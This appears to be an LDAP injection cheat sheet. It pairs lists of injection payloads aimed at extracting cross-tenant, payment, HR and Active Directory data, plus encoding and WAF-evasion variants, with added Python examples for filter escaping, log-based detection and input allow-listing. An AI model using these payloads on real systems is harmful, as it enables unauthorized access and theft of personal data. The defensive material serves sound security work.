username=service*)(&(objectClass=user*
username=*)(&(userAccountControl=*SERVICE*
Customer Portal Exploitation
SaaS Application Attack
Scenario: Multi-Tenant SaaS Platform
# Target: Customer portal with LDAP backend
# Goal: Access other customers' data
# Step 1: Identify tenant isolation
username=user@tenant1.com)(&(mail=*@tenant1.com*
password=anything
# Step 2: Attempt cross-tenant access
username=user@tenant1.com)(&(mail=*@tenant2.com*
password=anything
# Step 3: Enumerate all tenants
username=user@tenant1.com)(&(mail=*@*
password=anything
# Step 4: Target administrative accounts
username=user@tenant1.com)(&(mail=admin@*
username=user@tenant1.com)(&(mail=root@*
username=user@tenant1.com)(&(cn=*administrator*
# Step 5: Extract sensitive attributes
username=user@tenant1.com)(&(customerId=*
username=user@tenant1.com)(&(billingInfo=*
username=user@tenant1.com)(&(accountType=premium*
E-commerce Platform
Customer Account Takeover:
# Target: E-commerce customer accounts
# Goal: Account takeover and data extraction
# Customer enumeration
username=customer)(&(email=*@gmail.com*
username=customer)(&(email=*@yahoo.com*
username=customer)(&(email=*@hotmail.com*
# High-value customer targeting
username=customer)(&(accountType=premium*
username=customer)(&(loyaltyLevel=gold*
username=customer)(&(totalPurchases>=10000*
# Payment information discovery
username=customer)(&(paymentMethod=*
username=customer)(&(creditCardLast4=*
username=customer)(&(billingAddress=*
# Order history enumeration
username=customer)(&(lastOrderDate=*
username=customer)(&(orderCount>=*
username=customer)(&(favoriteCategory=*
Internal Directory Exploitation
HR System Attack
Employee Information Extraction:
# Target: HR management system
# Goal: Complete employee database extraction
# Basic employee enumeration
username=employee)(&(employeeType=fulltime*
username=employee)(&(employeeType=contractor*
username=employee)(&(employeeType=intern*
# Salary and compensation data
username=employee)(&(salary=*
username=employee)(&(payGrade=*
username=employee)(&(bonus=*
username=employee)(&(stockOptions=*
# Personal information extraction
username=employee)(&(ssn=*
username=employee)(&(dateOfBirth=*
username=employee)(&(emergencyContact=*
username=employee)(&(homeAddress=*
# Performance and review data
username=employee)(&(performanceRating=*
username=employee)(&(reviewDate=*
username=employee)(&(disciplinaryAction=*
IT Asset Management
Infrastructure Discovery:
# Target: IT asset management system
# Goal: Infrastructure mapping and security assessment
# Computer and server enumeration
username=admin)(&(objectClass=computer*
username=admin)(&(operatingSystem=Windows*
username=admin)(&(operatingSystem=Linux*
username=admin)(&(operatingSystem=*Server*
# Service account discovery
username=admin)(&(servicePrincipalName=HTTP/*
username=admin)(&(servicePrincipalName=MSSQL/*
username=admin)(&(servicePrincipalName=LDAP/*
username=admin)(&(servicePrincipalName=FTP/*
# Network infrastructure
username=admin)(&(dNSHostName=*.domain.com*
username=admin)(&(ipAddress=192.168.*
username=admin)(&(networkAddress=10.*
# Security groups and permissions
username=admin)(&(memberOf=*server*admin*
username=admin)(&(memberOf=*backup*operator*
username=admin)(&(memberOf=*domain*admin*
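Every payload in the scenario lists above depends on one thing: the username value closes the application's own (uid=...) assertion and opens new ones. The following is an added example, not code from the page, showing the construction that removes that possibility. RFC 4515 section 3 defines escapes for the characters that carry meaning inside an assertion value ('*', '(', ')', '\' and NUL); once they are escaped, user input is only ever compared as data. The attribute names, base DN and search limits are assumptions made for this example, and no directory is contacted.

```python
"""Escaping and allow-listing before an LDAP filter is built (added example)."""
import re
from typing import Dict, Optional

# RFC 4515 escapes. A single pass over the string means a backslash in the
# input is escaped once and never re-processed.
_FILTER_ESCAPES = {
    "\\": "\\5c",
    "*": "\\2a",
    "(": "\\28",
    ")": "\\29",
    "\x00": "\\00",
}

def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value for use inside an LDAP filter assertion."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)

# Allow-list for account names. Escaping alone already makes the filter safe;
# the allow-list additionally keeps anything that is not a plausible
# identifier out of the directory altogether.
_USERNAME_RE = re.compile(r"[A-Za-z0-9._@-]{1,64}")

def is_valid_username(username: str) -> bool:
    return _USERNAME_RE.fullmatch(username) is not None

# Attributes the application may search on (assumed). Users choose values
# only, never attribute names, so a fragment such as "(&(salary=*" can only
# ever appear inside an escaped value.
ALLOWED_SEARCH_ATTRS = frozenset({"departmentNumber", "l", "title"})

# Attributes the application needs back (assumed). Requesting only these, and
# binding with a service account whose ACL cannot read anything else, bounds
# what any query could disclose.
RETURNED_ATTRS = ("uid", "cn", "mail")

def build_user_filter(username: str, extra: Optional[Dict[str, str]] = None) -> str:
    """Return (&(objectClass=person)(uid=<user>)(<attr>=<value>)...)."""
    if not is_valid_username(username):
        raise ValueError("username rejected by allow-list")
    clauses = ["(objectClass=person)", f"(uid={escape_filter_value(username)})"]
    for attr, value in (extra or {}).items():
        if attr not in ALLOWED_SEARCH_ATTRS:
            raise ValueError(f"attribute {attr!r} is not searchable")
        clauses.append(f"({attr}={escape_filter_value(value)})")
    return "(&" + "".join(clauses) + ")"

def search_request(username: str, extra: Optional[Dict[str, str]] = None) -> dict:
    """Search parameters, named after ldap3's Connection.search keyword
    arguments. Size and time limits cap the cost of any wildcard-heavy filter
    that still reaches the server."""
    return {
        "search_base": "ou=people,dc=example,dc=com",   # assumed base DN
        "search_filter": build_user_filter(username, extra),
        "attributes": list(RETURNED_ATTRS),
        "size_limit": 1,
        "time_limit": 5,
    }

if __name__ == "__main__":
    # A fragment of the kind listed above, supplied as a free-text field
    # value: it is compared literally instead of widening the search.
    print(build_user_filter("alice", {"departmentNumber": "sales)(&(salary=*"}))
    # (&(objectClass=person)(uid=alice)(departmentNumber=sales\29\28&\28salary=\2a))
```

Passwords never belong in a filter at all: the search should resolve exactly one entry, and the password is then verified by binding as that entry's DN, so a filter that matches more than one entry or a substring can never stand in for a credential check.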
Advanced Evasion Techniques
Filter Encoding and Obfuscation
Character Encoding Methods
URL Encoding:
# Standard URL encoding
username: admin%29%28%26%28uid%3Dadmin
# Decoded: admin)(&(uid=admin
# Double URL encoding
username: admin%2529%2528%2526%2528uid%253Dadmin
# Decoded: admin)(&(uid=admin
# Mixed encoding
username: admin%29(&(uid%3Dadmin
# Partially encoded injection
Unicode Encoding:
# Unicode full-width characters
username: admin)(&(uid=admin
# Unicode alternatives for parentheses and operators
# Unicode normalization bypass
username: admin\u0029\u0028\u0026\u0028uid\u003Dadmin
# Unicode escape sequences
# Mixed Unicode and ASCII
username: admin)(&(uid=admin
# Combining different character sets
HTML Entity Encoding:
# HTML entity encoding
username: admin)(&(uid=admin
# Decimal entities
username: admin)(&(uid=admin
# Hexadecimal entities
# Mixed entity encoding
username: admin)(&(uid=admin
# Partial entity encoding
Alternative Representations
Case Variation:
# Mixed case attributes
username: admin)(&(UID=admin
username: admin)(&(Uid=admin
username: admin)(&(uId=admin
# Mixed case operators
username: admin)(&(uid=admin)(ObjectClass=person
username: admin)(&(uid=admin)(OBJECTCLASS=person
# Case-sensitive bypass attempts
username: ADMIN)(&(uid=admin
username: Admin)(&(uid=admin
Whitespace Manipulation:
# Extra whitespace
username: admin ) ( & ( uid = admin
username: admin)( &(uid=admin
# Tab characters
username: admin)(\t&\t(uid=admin
username: admin)\t(&(uid=admin
# Newline injection
username: admin)\n(&(uid=admin
username: admin)\r\n(&(uid=admin
Complex Filter Construction
Nested Filter Evasion
Deep Nesting:
# Multiple nesting levels
username: admin)(&(|(uid=admin)(|(cn=admin)(|(mail=admin*)(sn=admin*
password: anything
# Recursive filter construction
username: admin)(&(uid=admin)(&(uid=admin)(&(objectClass=person*
password: anything
# Complex boolean logic
username: admin)(&(|(!(disabled=true))(!(locked=true)))(&(active=true*
password: anything
Filter Fragmentation:
# Split across parameters
username: admin)(&(uid=admin
password: )(&(objectClass=person))(userPassword=anything
# Multi-field injection
username: admin*
department: )(&(memberOf=*admin*
location: )(&(title=*manager*
Timing-Based Evasion
Conditional Delays:
# Large result set timing
username: *)(&(|(uid=a*)(uid=b*)(uid=c*)(uid=d*)(uid=e*
password: anything
# Complex computation timing
username: admin)(&(memberOf=cn=*,ou=groups,ou=*,ou=*,dc=*,dc=*
password: anything
# Recursive attribute lookup
username: admin)(&(manager=cn=*,ou=users,dc=company,dc=com*
password: anything
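The nesting, fragmentation and timing payloads in this section share measurable traits once they land in a filter: nesting far deeper than the application's own queries, many wildcards, a leading wildcard (which defeats attribute indexes and forces a full scan), and often unbalanced parentheses, because each fragment is written around the application's trailing ')'. Servers normally reject the unbalanced ones with a protocol error, so a burst of bad-filter errors is itself a signal. The following detector, an added example rather than code from the page, scores filters pulled from application search logs; the log format, the sample lines and the thresholds are constructed assumptions.

```python
"""Scoring logged LDAP filters for signs of injection (added example)."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample log: one legitimate lookup followed by three filters
# produced by injecting payloads from this section into
# (&(uid=<username>)(userPassword=<password>)).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z app ldap_search filter="(&(uid=jsmith)(userPassword=secret123))"
2024-05-01T10:00:07Z app ldap_search filter="(&(uid=admin)(&(|(uid=admin)(|(cn=admin)(|(mail=admin*)(sn=admin*)(userPassword=anything))"
2024-05-01T10:00:09Z app ldap_search filter="(&(uid=*)(&(|(uid=a*)(uid=b*)(uid=c*)(uid=d*)(uid=e*)(userPassword=anything))"
2024-05-01T10:00:12Z app ldap_search filter="(&(uid=admin)(&(memberOf=cn=*,ou=groups,ou=*,ou=*,dc=*,dc=*)(userPassword=anything))"
"""

_FILTER_RE = re.compile(r'filter="([^"]*)"')
# One assertion: "(attr<op>value" with =, >=, <= or ~= as the operator.
_ASSERTION_RE = re.compile(r"\(([^()&|!=<>~]+)(=|>=|<=|~=)([^()]*)")

# What the application's own code generates (assumed): depth 2 and at most
# one trailing '*' for type-ahead search.
MAX_DEPTH = 3
MAX_WILDCARDS = 1

@dataclass
class FilterStats:
    depth: int              # maximum parenthesis nesting
    assertions: int         # number of attribute/value assertions
    wildcards: int          # total '*' characters
    leading_wildcard: bool  # some value starts with '*'
    balanced: bool          # opening and closing parentheses match

def analyze_filter(f: str) -> FilterStats:
    depth = cur = 0
    for ch in f:
        if ch == "(":
            cur += 1
            depth = max(depth, cur)
        elif ch == ")":
            cur -= 1
    found = _ASSERTION_RE.findall(f)
    leading = any(val.startswith("*") for _, _, val in found)
    return FilterStats(depth, len(found), f.count("*"), leading, cur == 0)

def suspicious(f: str) -> List[str]:
    """Reasons this filter looks injected; empty for a normal one."""
    s = analyze_filter(f)
    reasons = []
    if not s.balanced:
        reasons.append("unbalanced parentheses")
    if s.depth > MAX_DEPTH:
        reasons.append(f"nesting depth {s.depth} exceeds {MAX_DEPTH}")
    if s.wildcards > MAX_WILDCARDS:
        reasons.append(f"{s.wildcards} wildcards exceed {MAX_WILDCARDS}")
    if s.leading_wildcard:
        reasons.append("leading wildcard forces an unindexed scan")
    return reasons

def scan_log(text: str) -> List[Tuple[str, List[str]]]:
    """Return (filter, reasons) for every logged filter that scores as suspicious."""
    hits = []
    for line in text.splitlines():
        m = _FILTER_RE.search(line)
        if m and (reasons := suspicious(m.group(1))):
            hits.append((m.group(1), reasons))
    return hits

if __name__ == "__main__":
    for flt, reasons in scan_log(SAMPLE_LOG):
        print(f"{flt}\n    -> {'; '.join(reasons)}")
```

Tune MAX_DEPTH and MAX_WILDCARDS from a sample of the application's legitimate filters before alerting on them; an application that never emits an OR or a leading wildcard can treat a single occurrence as high confidence.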
WAF and Filter Bypass
Common WAF Evasion
Keyword Avoidance:
# Avoid 'admin' keyword
username: adm*)(&(uid=adm*
username: a*in)(&(uid=admin
# Attribute name variations
username: user)(&(samAccountName=admin* # Instead of uid
username: user)(&(cn=admin* # Instead of uid
username: user)(&(displayName=admin* # Instead of uid
Pattern Breaking:
# Break common injection patterns
username: user)(objectClass=person)(&(uid=admin
# Instead of: user)(&(uid=admin
username: user)(!objectClass=computer)(&(uid=admin
# Using negation to break patterns
username: user)(uid>=a)(&(uid<=z)(&(uid=admin
# Using comparison operators
Length-Based Evasion
Payload Truncation:
# Short payloads to avoid length limits
username: *)|(uid=*
username: a*)|(cn=*
username: u*)|(mail=*
# Incremental payload building
# Request 1:
username: admin*
# Request 2 (if first succeeds):
username: admin)(&(uid=*
# Request 3:
username: admin)(&(uid=admin*
Character Limit Bypass:
# Abbreviated attributes
username: admin)(&(cn=* # Short for commonName
username: admin)(&(sn=* # Short for surname
username: admin)(&(o=* # Short for organization
# Minimal viable payloads
username: *)|(uid=*
username: x*)|(cn=*
username: *)|(o=*
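The encoding, case and whitespace variants under "Filter Encoding and Obfuscation" and the keyword-avoidance and short payloads under "WAF and Filter Bypass" all target the same weakness: a rule that inspects the raw parameter for a fixed substring. The following added example, not code from the page, shows the two measures that remove that weakness. First, inspect the value only after undoing the decodings it will go through before reaching the directory (repeated URL decoding, HTML entities, literal \uXXXX escapes, Unicode compatibility normalization); second, accept an allow-listed character set instead of rejecting known-bad strings. The blocklist is a deliberately weak, constructed rule kept for comparison, and the sample inputs are constructed from the forms shown in those sections.

```python
"""Canonicalize, then allow-list: why keyword rules miss encoded input (added example)."""
import html
import re
import unicodedata
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3   # bounds repeated decoding of "%2529..." style input

def canonicalize(value: str) -> str:
    """Return the form of `value` an LDAP filter would actually receive."""
    prev = None
    for _ in range(MAX_DECODE_ROUNDS):
        if value == prev:              # nothing changed in the last round
            break
        prev = value
        value = unquote(value)         # %29 now, %2529 on the next round
        value = html.unescape(value)   # &#41; &#x29; &rpar;
        value = re.sub(r"\\u([0-9a-fA-F]{4})",   # literal \u0029 escapes
                       lambda m: chr(int(m.group(1), 16)), value)
    value = unicodedata.normalize("NFKC", value)   # full-width forms -> ASCII
    return re.sub(r"\s+", "", value)                # tabs/newlines between tokens

# Constructed weak rule: substring search on the raw parameter.
_NAIVE_BLOCKLIST = (")(&(", "admin", "userPassword")

def naive_blocklist_rejects(raw: str) -> bool:
    return any(bad in raw for bad in _NAIVE_BLOCKLIST)

# Positive rule: an account name is a short token from a fixed character set,
# and that must hold both before and after canonicalization.
_USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")

def allowlist_rejects(raw: str) -> bool:
    return not (_USERNAME_RE.fullmatch(raw)
                and _USERNAME_RE.fullmatch(canonicalize(raw)))

def ldap_metachars_after_decoding(raw: str) -> Set[str]:
    """For alerting: RFC 4515 metacharacters present once the value is decoded."""
    return set(canonicalize(raw)) & set("()*\\\x00")

# Constructed inputs modelled on the variants shown in this section.
SAMPLE_PAYLOADS: List[str] = [
    "jsmith",                                     # legitimate account name
    "user%29%28%26%28cn%3D*",                     # URL-encoded
    "user%2529%2528%2526%2528cn%253D*",           # double URL-encoded
    "user&#41;&#40;&#38;&#40;cn&#61;*",           # HTML decimal entities
    "user\\u0029\\u0028\\u0026\\u0028cn\\u003D*", # literal \u escapes
    "user）（＆（cn＝*",                            # full-width characters
    "user ) ( & ( cn = *",                        # whitespace padding
    "*)|(uid=*",                                  # short OR payload, no ")(&("
]

def compare_samples() -> Dict[str, Tuple[bool, bool]]:
    """Map each sample to (blocklist rejects?, allow-list rejects?)."""
    return {p: (naive_blocklist_rejects(p), allowlist_rejects(p))
            for p in SAMPLE_PAYLOADS}

if __name__ == "__main__":
    for raw, (blocked, rejected) in compare_samples().items():
        print(f"{raw!r:48} blocklist={blocked!s:5} allowlist={rejected!s:5} "
              f"decoded={canonicalize(raw)!r}")
```

Every encoded sample passes the blocklist and fails the allow-list, while the legitimate name passes both. The case-variation payloads need no special handling at all: the directory matches attribute names case-insensitively, so "UID" and "uid" are the same attribute to the server, and case tricks only ever defeat an inspection layer that compares keywords, which is one more reason to validate the shape of the value rather than hunt for words in it.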